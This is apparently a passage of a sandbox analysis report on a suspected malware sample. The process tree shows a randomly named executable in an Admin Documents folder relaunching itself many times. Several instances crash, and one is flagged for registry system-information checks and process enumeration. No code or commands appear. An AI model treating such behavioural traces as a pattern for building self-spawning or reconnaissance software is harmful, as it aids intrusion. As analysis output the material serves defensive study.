    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5268
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1904
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6480
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8440
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9080
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1832
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8500
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4720
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6156
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4908
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5584
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9072
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8824
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7784
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7096
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8884
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6916
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8220
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3116
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 164
      4⤵
      Program crash
      PID:3380
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2544
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1852
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4300
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8680
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8536
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3904
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8040
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4856
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1388
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9408
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9672
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9888
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9268
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9268 -s 164
      4⤵
      Program crash
      PID:9920
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9876
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4556
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8556
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10648
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11104
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9612
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10772
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11684
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12184
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12112
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12656
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13048
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12292
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11740
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14272
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13796
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14112
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10920
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9552
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8136
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14260
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11020
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12684
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14472
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15020
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14208
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14664
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13980
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15196
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14920
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 28
      4⤵
      Program crash
      PID:10328
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11908
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8352
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13952
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10196
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9968
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10852
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15064
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3016
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9828
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:896
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15368
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15648
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15696
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9840
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12608
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9076
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14492
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14136
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14456
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14936
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9616
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4824
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11588
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8316
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10488
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15256
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12016
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4140
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5660
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6320
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10928
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15864
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6428
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12964
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13868
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3412
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6684
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8300
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9940
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15988
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11292
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15912
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3984
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15720
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10800
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8120
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13700
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11604
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5980
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11540
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:16208
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10460
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5032
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12260
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12460
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4688
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13544
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9760
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2860
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11632
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10504
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9352
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9536
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 28
      4⤵
      Program crash
      PID:9692
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10384
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 28
      4⤵
      Program crash
      PID:12564
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:132
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 28
      4⤵
      Program crash
      PID:13424
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8912
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9092
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12684
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11320
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3252
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13836
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15980
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6840
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6148
